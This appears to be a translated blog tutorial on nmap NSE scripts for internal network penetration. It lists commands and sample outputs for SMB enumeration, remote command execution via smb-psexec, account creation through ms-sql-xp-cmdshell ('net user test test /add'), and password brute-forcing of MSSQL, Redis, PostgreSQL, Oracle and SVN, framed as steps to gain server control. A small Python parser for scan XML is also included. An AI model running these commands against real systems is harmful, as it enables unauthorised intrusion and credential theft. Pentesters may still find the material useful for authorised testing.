Using nmap to load NSE scripts for internal network penetration (part 2)

smb-ls.nse lists the files inside shared directories; use it together with smb-enum-shares.
nmap -p 445 <ip> --script smb-ls --script-args 'share=c$,path=\temp'
nmap -p 445 <ip> --script smb-enum-shares,smb-ls
Script Output 

Host script results:
| smb-ls:
|   Volume \\192.168.56.101\c$\
|   SIZE   TIME                 FILENAME
|   0      2007-12-02 00:20:09  AUTOEXEC.BAT
|   0      2007-12-02 00:20:09  CONFIG.SYS
|   <DIR>  2007-12-02 00:53:39  Documents and Settings
|   <DIR>  2009-09-08 13:26:10  e5a6b742d36facb19c5192852c43
|   <DIR>  2008-12-01 02:06:29  Inetpub
|   94720  2007-02-18 00:31:38  msizap.exe
|   <DIR>  2007-12-02 00:55:01  Program Files
|   <DIR>  2008-12-01 02:05:52  temp
|   <DIR>  2011-12-16 14:40:18  usr
|   <DIR>  2007-12-02 00:42:40  WINDOWS
|   <DIR>  2007-12-02 00:22:38  WMPub
|_

Of course, these scripts can be combined and run together in a single pass:
nmap -v -sV --min-hostgroup 50 --script=smb-os-discovery,smbv2-enabled,smb-enum-domains,smb-enum-groups,smb-enum-shares,smb-enum-processes,smb-enum-sessions,smb-enum-users,smb-ls,smb-security-mode,smb-server-stats,smb-system-info -p 445 -oA xx 10.65.152.101
This gathers all the SMB-related information in one go and, with -oA, saves it to files named xx (xx.nmap, xx.gnmap and xx.xml), which we can then review locally.
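The xx.xml that -oA writes is easier to triage than the text output. As an added example that is not part of the original post, here is a small Python parser that pulls the host script results out of that XML and picks out hosts whose smb-security-mode result reports SMB signing disabled; the XML embedded in the code is a constructed sample, not real scan data.

```python
import xml.etree.ElementTree as ET
# Constructed sample of nmap's XML (-oA xx writes xx.xml); not real scan data.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -p 445 --script smb-os-discovery,smb-security-mode,smb-enum-shares -oA xx">
  <host>
    <address addr="10.65.152.101" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-os-discovery" output="">
        <elem key="os">Windows Server 2008 R2 Standard 7601 Service Pack 1</elem>
      </script>
      <script id="smb-security-mode" output="">
        <elem key="message_signing">disabled (dangerous, but default)</elem>
      </script>
      <script id="smb-enum-shares" output="">
        <table key="\\\\10.65.152.101\\ADMIN$">
          <elem key="Anonymous access">&lt;none&gt;</elem>
        </table>
      </script>
    </hostscript>
  </host>
</nmaprun>
"""

def _collect(node, prefix="", out=None):
    # Flatten nested <table>/<elem> output into "table key/elem key" entries.
    out = {} if out is None else out
    for child in node:
        key = child.get("key") or ""
        if child.tag == "elem":
            out[prefix + key] = (child.text or "").strip()
        elif child.tag == "table":
            _collect(child, prefix + key + "/", out)
    return out

def parse_hostscripts(xml_text):
    # Returns {ip: {script_id: {key: value}}} for every <hostscript> block.
    results = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        scripts = {}
        for hs in host.findall("hostscript"):
            for script in hs.findall("script"):
                scripts[script.get("id")] = _collect(script)
        results[addr.get("addr")] = scripts
    return results

def hosts_without_smb_signing(results):
    # Hosts whose smb-security-mode result reports signing disabled (hardening finding).
    return sorted(ip for ip, s in results.items()
                  if s.get("smb-security-mode", {}).get("message_signing", "").startswith("disabled"))
```

Run it on a real xx.xml by replacing SAMPLE_XML with the file contents; the same structure holds for every NSE script that emits structured output.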

smb-psexec.nse: once we have obtained an SMB user's password, we can execute commands on the remote host through smb-psexec.
nmap --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p445 <host>
sudo nmap -sU -sS --script smb-psexec.nse --script-args=smbuser=<username>,smbpass=<password>[,config=<config>] -p U:137,T:139 <host>
Script Output 

Host script results:
|  smb-psexec:
|  |  Windows version
|  |  |_ Microsoft Windows 2000 [Version 5.00.2195]
|  |  IP Address and MAC Address from 'ipconfig.exe'
|  |  |  Ethernet adapter Local Area Connection 2:
|  |  |         MAC Address: 00:50:56:A1:24:C2
|  |  |         IP Address: 10.0.0.30
|  |  |  Ethernet adapter Local Area Connection:
|  |  |_        MAC Address: 00:50:56:A1:00:65
|  |  User list from 'net user'
|  |  |  Administrator            TestUser3                Guest
|  |  |  IUSR_RON-WIN2K-TEST      IWAM_RON-WIN2K-TEST      nmap
|  |  |  rontest123               sshd                     SvcCOPSSH
|  |  |_ test1234                 Testing                  TsInternetUser
|  |  Membership of 'administrators' from 'net localgroup administrators'
|  |  |  Administrator
|  |  |  SvcCOPSSH
|  |  |  test1234
|  |  |_ Testing
|  |  Can the host ping our address?
|  |  |  Pinging 10.0.0.138 with 32 bytes of data:
|  |  |_ Reply from 10.0.0.138: bytes=32 time<10ms TTL=64
|  |  Traceroute back to the scanner
|  |  |_   1   <10 ms   <10 ms   <10 ms  10.0.0.138
|  |  ARP Cache from arp.exe
|  |  |    Internet Address      Physical Address      Type
|  |  |_   10.0.0.138            00-50-56-a1-27-4b     dynamic
|  |  List of listening and established connections (netstat -an)
|  |  |    Proto  Local Address          Foreign Address        State
|  |  |    TCP    0.0.0.0:22             0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:25             0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:443            0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:1028           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:1029           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
|  |  |    TCP    0.0.0.0:4933           0.0.0.0:0              LISTENING
|  |  |    TCP    10.0.0.30:139          0.0.0.0:0              LISTENING
|  |  |    TCP    127.0.0.1:2528         127.0.0.1:2529         ESTABLISHED
|  |  |    TCP    127.0.0.1:2529         127.0.0.1:2528         ESTABLISHED
|  |  |    TCP    127.0.0.1:2531         127.0.0.1:2532         ESTABLISHED
|  |  |    TCP    127.0.0.1:2532         127.0.0.1:2531         ESTABLISHED
|  |  |    TCP    127.0.0.1:5152         0.0.0.0:0              LISTENING
|  |  |    TCP    127.0.0.1:5152         127.0.0.1:2530         CLOSE_WAIT
|  |  |    UDP    0.0.0.0:135            *:*
|  |  |    UDP    0.0.0.0:445            *:*
|  |  |    UDP    0.0.0.0:1030           *:*
|  |  |    UDP    0.0.0.0:3456           *:*
|  |  |    UDP    10.0.0.30:137          *:*
|  |  |    UDP    10.0.0.30:138          *:*
|  |  |    UDP    10.0.0.30:500          *:*
|  |  |    UDP    10.0.0.30:4500         *:*
|  |  |_   UDP    127.0.0.1:1026         *:*
|  |  Full routing table from 'netstat -nr'
|  |  |  ===========================================================================
|  |  |  Interface List
|  |  |  0x1 ........................... MS TCP Loopback interface
|  |  |  0x2 ...00 50 56 a1 00 65 ...... VMware Accelerated AMD PCNet Adapter
|  |  |  0x1000004 ...00 50 56 a1 24 c2 ...... VMware Accelerated AMD PCNet Adapter
|  |  |  ===========================================================================
|  |  |  ===========================================================================
|  |  |  Active Routes:
|  |  |  Network Destination        Netmask          Gateway       Interface  Metric
|  |  |           10.0.0.0    255.255.255.0        10.0.0.30       10.0.0.30      1
|  |  |            10.0.0.30  255.255.255.255        127.0.0.1       127.0.0.1      1
|  |  |       10.255.255.255  255.255.255.255        10.0.0.30       10.0.0.30      1
|  |  |            127.0.0.0        255.0.0.0        127.0.0.1       127.0.0.1      1
|  |  |            224.0.0.0        224.0.0.0        10.0.0.30       10.0.0.30      1
|  |  |      255.255.255.255  255.255.255.255        10.0.0.30               2      1
|  |  |  ===========================================================================
|  |  |  Persistent Routes:
|  |  |    None
|_ |_ |_ Route Table

smb-system-info.nse retrieves the target host's operating system details, environment variables, hardware information and browser versions over the SMB protocol.
nmap --script smb-system-info.nse -p445 <host>
sudo nmap -sU -sS --script smb-system-info.nse -p U:137,T:139 <host>
Script Output 

Host script results:
|  smb-system-info:
|  |  OS Details
|  |  |  Microsoft Windows 2000 Service Pack 4 (ServerNT 5.0 build 2195)
|  |  |  Installed on 2008-10-10 05:47:19
|  |  |  Registered to Ron (organization: Government of Manitoba)
|  |  |  Path: %SystemRoot%\system32;%SystemRoot%;%SystemRoot%\System32\Wbem;C:\Program Files\Graphviz2.20\Bin;
|  |  |  Systemroot: C:\WINNT
|  |  |_ Page files: C:\pagefile.sys 192 384 (cleared at shutdown => 0)
|  |  Hardware
|  |  |  CPU 0: Intel(R) Xeon(TM) CPU 2.80GHz [2800mhz GenuineIntel]
|  |  |  |_ Identifier 0: x86 Family 15 Model 3 Stepping 8
|  |  |_ Video driver: VMware SVGA II
|  |  Browsers
|  |  |  Internet Explorer 6.0000
|_ |_ |_ Firefox 3.0.12 (en-US)


Next, ms-sql-brute.nse. The passwords collected for certain users can sometimes be combined into a dictionary and used to brute-force the MSSQL machines on the internal network; this can quickly yield MSSQL administrative privileges, and from there administrative rights on the target machine by other means.
nmap -p 445 --script ms-sql-brute --script-args mssql.instance-all,userdb=customuser.txt,passdb=custompass.txt <host>
nmap -p 1433 --script ms-sql-brute --script-args userdb=customuser.txt,passdb=custompass.txt <host>
Script Output

| ms-sql-brute:
|   [192.168.100.128\TEST]
|     No credentials found
|     Warnings:
|       sa: AccountLockedOut
|   [192.168.100.128\PROD]
|     Credentials found:
|       webshop_reader:secret => Login Success
|       testuser:secret1234 => PasswordMustChange
|_      lordvader:secret1234 => Login Success

ms-sql-xp-cmdshell.nse, as the name suggests: once we know the username and password of the privileged MSSQL sa account, we can have nmap run a command we specify through this script, either over the MSSQL protocol or over SMB.
nmap -p 445 --script ms-sql-discover,ms-sql-empty-password,ms-sql-xp-cmdshell <host>
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user test test /add" <host>
Script Output

| ms-sql-xp-cmdshell:
|   [192.168.56.3\MSSQLSERVER]
|     Command: ipconfig /all
|     Output
|     ======
|
|       Windows IP Configuration
|
|          Host Name . . . . . . . . . . . . : EDUSRV011
|          Primary Dns Suffix  . . . . . . . : cqure.net
|          Node Type . . . . . . . . . . . . : Unknown
|          IP Routing Enabled. . . . . . . . : No
|          WINS Proxy Enabled. . . . . . . . : No
|          DNS Suffix Search List. . . . . . : cqure.net
|
|       Ethernet adapter Local Area Connection 3:
|
|          Connection-specific DNS Suffix  . :
|          Description . . . . . . . . . . . : AMD PCNET Family PCI Ethernet Adapter #2
|          Physical Address. . . . . . . . . : 08-00-DE-AD-C0-DE
|          DHCP Enabled. . . . . . . . . . . : Yes
|          Autoconfiguration Enabled . . . . : Yes
|          IP Address. . . . . . . . . . . . : 192.168.56.3
|          Subnet Mask . . . . . . . . . . . : 255.255.255.0
|          Default Gateway . . . . . . . . . :
|          DHCP Server . . . . . . . . . . . : 192.168.56.2
|          Lease Obtained. . . . . . . . . . : den 21 mars 2010 00:12:10
|          Lease Expires . . . . . . . . . . : den 21 mars 2010 01:12:10
|_


redis-brute.nse needs little introduction: it brute-forces the Redis password, and combined with the Redis ssh key write-up from a while back it can get you privileges on the server.
nmap -p 6379 <ip> --script redis-brute
Script Output

PORT     STATE SERVICE
6379/tcp open  unknown
| redis-brute:
|   Accounts
|     toledo - Valid credentials
|   Statistics
|_    Performed 5000 guesses in 3 seconds, average tps: 1666

oracle-sid-brute.nse brute-forces the Oracle SID using a loaded dictionary.
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 <host>
nmap --script=oracle-sid-brute -p 1521-1560 <host>
Script Output

PORT     STATE SERVICE REASON
1521/tcp open  oracle  syn-ack
| oracle-sid-brute:
|   orcl
|   prod
|_  devel

pgsql-brute.nse is a PostgreSQL user password guessing script, used to brute-force pgsql passwords; with the right privileges you can then read and write files and execute commands, and so go on to take control of the server.
nmap -p 5432 --script pgsql-brute <host>
Script Output

5432/tcp open  pgsql
| pgsql-brute:
|   root:<empty> => Valid credentials
|_  test:test => Valid credentials


oracle-enum-users.nse loads a dictionary and enumerates the valid Oracle user accounts.
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <host>

If no userdb is supplied, the default user list is used.
Script Output 

PORT     STATE SERVICE REASON
1521/tcp open  oracle  syn-ack
| oracle-enum-users:
|   haxxor is a valid user account
|   noob is a valid user account
|_  patrik is a valid user account


oracle-brute.nse: once we know the SID, we can brute-force the Oracle user passwords and then carry out further operations.
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <host>
Script Output 

PORT     STATE  SERVICE REASON
1521/tcp open  oracle  syn-ack
| oracle-brute:
|   Accounts
|     system:powell => Account locked
|     haxxor:haxxor => Valid credentials
|   Statistics
|_    Perfomed 157 guesses in 8 seconds, average tps: 19

svn-brute.nse: many SVN servers exist inside enterprise networks, and from their content we can download source code and find useful information; svn-brute brute-forces the SVN server.
nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 <host>
Script Output

PORT     STATE SERVICE REASON
3690/tcp open  svn     syn-ack
| svn-brute:
|   Accounts
|_    patrik:secret => Login correct

Summary
-------
  x-svn     The class contains the code needed to perform the CRAM-MD5
            authentication
  x-Driver  The Driver class contains the driver implementation used by the
            brute library

These are some of the nmap scripts I personally use often in internal network penetration. Of course, such scans will frequently trigger an IDS or other security devices, so using them is a matter of judgement; there is no one-size-fits-all answer, and the right scripts should be chosen according to the actual circumstances.

Source: www.cnblogs.com/nul1/p/11225207.html